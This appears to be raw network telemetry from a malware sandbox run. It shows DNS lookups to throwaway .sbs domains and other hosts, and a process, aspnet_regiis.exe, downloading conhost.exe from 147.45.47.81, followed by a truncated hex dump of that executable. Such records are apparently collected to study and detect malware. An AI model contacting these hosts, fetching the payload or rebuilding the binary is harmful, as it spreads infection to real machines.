                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053946972 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.054285049 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.054296970 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.054306030 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.054316998 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.054333925 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.054359913 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.169888020 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.169904947 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.169924021 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.169940948 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.169953108 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.169964075 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.169962883 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.169975996 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.169989109 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.169997931 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.170012951 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.170034885 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.170414925 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.170430899 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.170454025 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.170466900 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.170470953 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.170476913 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.170491934 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.170522928 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.170557976 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.170825005 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.170836926 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.170850039 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.170874119 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.173835039 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.173850060 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.173861027 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.173871040 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.173882008 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.173890114 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.173893929 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.173906088 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.173916101 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.173923969 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.173927069 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.173944950 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.173969030 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287168980 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287187099 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287199020 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287240982 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287599087 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287611008 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287621975 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287632942 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287642956 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287652016 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287684917 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287686110 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287697077 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287708998 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287746906 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287962914 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.287975073 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.288024902 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.288522959 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.288535118 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.288546085 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.288573980 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.288602114 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.291415930 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.291462898 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.291475058 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.291501045 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.291513920 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.291526079 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.291538000 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.291549921 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.291563034 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.291580915 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.291588068 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.291594028 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.291605949 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.291618109 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.291645050 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.404351950 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.404380083 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.404390097 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.404398918 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.404408932 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.404417038 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.404427052 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.404432058 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.404441118 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.404448986 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.404479027 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.404489040 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.404490948 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.404498100 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.404514074 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.404544115 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.405096054 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.405103922 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.405113935 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.405145884 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.405222893 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.405232906 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.405262947 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.408298016 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.408344030 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.411155939 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.412241936 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.412251949 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.412261009 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.412270069 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.412291050 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.412317038 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.412492037 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.412501097 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.412509918 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.412518978 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.412528992 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.412535906 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.412549973 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.412576914 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.413836002 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.414056063 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.414093018 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.489995003 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.490066051 CET4999680192.168.2.10147.45.47.81
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Nov 14, 2024 12:19:26.943413973 CET5943553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 14, 2024 12:19:26.966113091 CET53594351.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.021060944 CET5400353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.043066025 CET53540031.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.048602104 CET5508253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.071094990 CET53550821.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.080610991 CET5262053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.102776051 CET53526201.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.105185032 CET6204953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.127639055 CET53620491.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.129637003 CET5288453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.151985884 CET53528841.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.155239105 CET5294753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.177803993 CET53529471.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.180272102 CET5533653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.203433990 CET53553361.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.206023932 CET5361753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.229285002 CET53536171.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.232445955 CET5169253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.240844965 CET53516921.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.860579014 CET5702853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.019192934 CET53570281.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.869997025 CET6351953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.880589962 CET53635191.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:09.603439093 CET5328753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 14, 2024 12:20:10.247442007 CET53532871.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:14.562868118 CET5641053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 14, 2024 12:20:14.569957972 CET53564101.1.1.1192.168.2.10
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            Nov 14, 2024 12:19:26.943413973 CET192.168.2.101.1.1.10x7da2Standard query (0)pragapin.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.021060944 CET192.168.2.101.1.1.10x1e13Standard query (0)repostebhu.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.048602104 CET192.168.2.101.1.1.10xcc6fStandard query (0)thinkyyokej.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.080610991 CET192.168.2.101.1.1.10xcc46Standard query (0)ducksringjk.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.105185032 CET192.168.2.101.1.1.10x7b5aStandard query (0)explainvees.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.129637003 CET192.168.2.101.1.1.10x92f6Standard query (0)brownieyuz.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.155239105 CET192.168.2.101.1.1.10xb3f4Standard query (0)rottieud.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.180272102 CET192.168.2.101.1.1.10xc6f3Standard query (0)relalingj.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.206023932 CET192.168.2.101.1.1.10x8e15Standard query (0)tamedgeesy.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.232445955 CET192.168.2.101.1.1.10xe97aStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.860579014 CET192.168.2.101.1.1.10x39c0Standard query (0)marshal-zhukov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.869997025 CET192.168.2.101.1.1.10x67a2Standard query (0)marshal-zhukov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:20:09.603439093 CET192.168.2.101.1.1.10x3df9Standard query (0)joxi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:20:14.562868118 CET192.168.2.101.1.1.10x96b5Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            Nov 14, 2024 12:19:08.088198900 CET1.1.1.1192.168.2.100x66d0No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:08.088198900 CET1.1.1.1192.168.2.100x66d0No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:26.966113091 CET1.1.1.1192.168.2.100x7da2Name error (3)pragapin.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.043066025 CET1.1.1.1192.168.2.100x1e13Name error (3)repostebhu.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.071094990 CET1.1.1.1192.168.2.100xcc6fName error (3)thinkyyokej.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.102776051 CET1.1.1.1192.168.2.100xcc46Name error (3)ducksringjk.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.127639055 CET1.1.1.1192.168.2.100x7b5aName error (3)explainvees.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.151985884 CET1.1.1.1192.168.2.100x92f6Name error (3)brownieyuz.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.177803993 CET1.1.1.1192.168.2.100xb3f4Name error (3)rottieud.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.203433990 CET1.1.1.1192.168.2.100xc6f3Name error (3)relalingj.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.229285002 CET1.1.1.1192.168.2.100x8e15Name error (3)tamedgeesy.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.240844965 CET1.1.1.1192.168.2.100xe97aNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.019192934 CET1.1.1.1192.168.2.100x39c0No error (0)marshal-zhukov.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.019192934 CET1.1.1.1192.168.2.100x39c0No error (0)marshal-zhukov.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.880589962 CET1.1.1.1192.168.2.100x67a2No error (0)marshal-zhukov.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.880589962 CET1.1.1.1192.168.2.100x67a2No error (0)marshal-zhukov.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:20:10.247442007 CET1.1.1.1192.168.2.100x3df9No error (0)joxi.net78.47.21.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:20:10.247442007 CET1.1.1.1192.168.2.100x3df9No error (0)joxi.net176.9.162.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:20:14.569957972 CET1.1.1.1192.168.2.100x96b5No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:20:14.569957972 CET1.1.1.1192.168.2.100x96b5No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 14, 2024 12:20:14.569957972 CET1.1.1.1192.168.2.100x96b5No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                                                            • marshal-zhukov.com
                                                                                                                                                                                                            • pastebin.com
                                                                                                                                                                                                            • 147.45.47.81
                                                                                                                                                                                                            • joxi.net
                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.1049957147.45.47.81807232C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.172616959 CET198OUTGET /conhost.exe HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Host: 147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037372112 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:56 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 3125704
                                                                                                                                                                                                            Last-Modified: Tue, 20 Aug 2024 12:02:17 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "66c485c9-2fb1c8"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 58 05 30 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 d4 4e 00 00 00 00 00 00 00 00 00 00 c0 75 2f 00 08 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: MZ`@`!L!Require Windows$PEL?O_@X00Nu/<l.text `.rdata;<@@.dataM@.rsrcN0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037426949 CET1236INData Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1
                                                                                                                                                                                                            Data Ascii: jZQ39FY~9F~fAfG@;F|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A|At>E;Ew6rE;Es,j*P*YYtlAj@ AEPjh5XAA3D$tlA
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037440062 CET1236INData Raw: 3b f3 74 06 8b 06 56 ff 50 08 33 c0 40 eb 25 e8 a7 fe ff ff 8d 4d e0 8b f8 e8 bb 0e 01 00 8b 06 56 ff 50 08 8b c7 eb 0c 3b f3 74 06 8b 06 56 ff 50 08 33 c0 5e 5f 5b c9 c3 56 8b f1 c7 46 04 60 c3 41 00 83 66 08 00 c7 06 34 a5 41 00 c7 46 04 24 a5
                                                                                                                                                                                                            Data Ascii: ;tVP3@%MVP;tVP3^_[VF`Af4AF$AfNf$N(^Uh$AuYYtEP#UPQ3hAudYYu@]Vv({F$YtPQvzvYtVP^l$
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037461042 CET1236INData Raw: 7d c4 0f 84 d0 02 00 00 66 83 7d c4 08 0f 85 c5 02 00 00 ff 75 cc 8d 4d f0 e8 76 f8 ff ff 8d 45 f0 50 8d 46 10 50 8d 45 e4 50 8d 5e 28 e8 1f fc ff ff 83 c4 0c 50 8b cb e8 90 f8 ff ff ff 75 e4 e8 b6 76 01 00 39 7d 14 59 0f 85 6f 02 00 00 8b 46 0c
                                                                                                                                                                                                            Data Ascii: }f}uMvEPFPEP^(Puv9}YoFURjuf}f}PQ;EtMu{v}Y^f9}u~@-f}t jeVPMXuFvY,EF@FURjuPQ;Eu3f9}URjuF<F
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037472010 CET1236INData Raw: a2 41 00 8b f8 3b fe 74 33 56 6a 01 6a 01 57 ff 15 a4 a2 41 00 56 56 56 8d 45 e4 50 ff 15 a8 a2 41 00 8d 45 e4 50 ff 15 ac a2 41 00 6a 01 57 ff 15 b0 a2 41 00 57 ff 15 b4 a2 41 00 5f 5e c9 c3 53 ff 74 24 08 ff 15 94 a2 41 00 8b d8 85 db 75 02 5b
                                                                                                                                                                                                            Data Ascii: A;t3VjjWAVVVEPAEPAjWAWA_^St$Au[VW|$Wt$A5AWSWS_3^@[UDSVWjpA5XAAPuuSuhuuSt&utWS\AWS`AtPdAz=Auo5h
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037483931 CET860INData Raw: 59 8b 4d fc 41 51 50 89 45 f8 8d 45 98 50 ff d3 3b 45 fc 77 40 ff d7 85 c0 75 3a 8b 86 bc e0 41 00 85 c0 74 25 8b 7d f8 57 50 ff 15 2c a1 41 00 85 c0 74 13 ff b6 bc e0 41 00 e8 14 6d 01 00 89 be bc e0 41 00 eb 16 57 eb 0e 8b 45 f8 89 86 bc e0 41
                                                                                                                                                                                                            Data Ascii: YMAQPEEP;Ew@u:At%}WP,AtAmAWEAulYuAAAA9t;AuS0AG3jZGQl=AYAu:%AjXPAhP4A~XP
